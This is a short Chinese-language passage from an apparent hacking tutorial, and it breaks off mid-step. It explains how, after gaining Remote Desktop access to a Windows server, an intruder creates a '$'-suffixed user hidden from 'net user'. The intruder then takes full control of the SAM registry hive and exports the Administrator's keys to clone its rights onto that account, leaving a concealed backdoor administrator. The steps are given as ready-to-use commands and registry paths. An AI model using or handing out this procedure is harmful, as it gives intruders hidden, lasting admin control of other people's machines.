当登陆进3389以后–
先建立 IUSR_MachineName$ 用户
c:\>net user IUSR_MachineName$ yourpassword /add
//后面加$ 是为了使在 控制台下用 net user 看不到.
然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单”安全”->”权限” 添加自己现在登录的帐户或组,
把”权限”->”完全控制”->”允许”打上勾,然后确定.
这样就可以直接读取本地sam的信息
现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\IUSR_MachineName$
查看默认键值为”0x3f1″ 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\IUSR_MachineName$ 为IUSR_MachineName$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的”F”的值,比如这个例子中如下
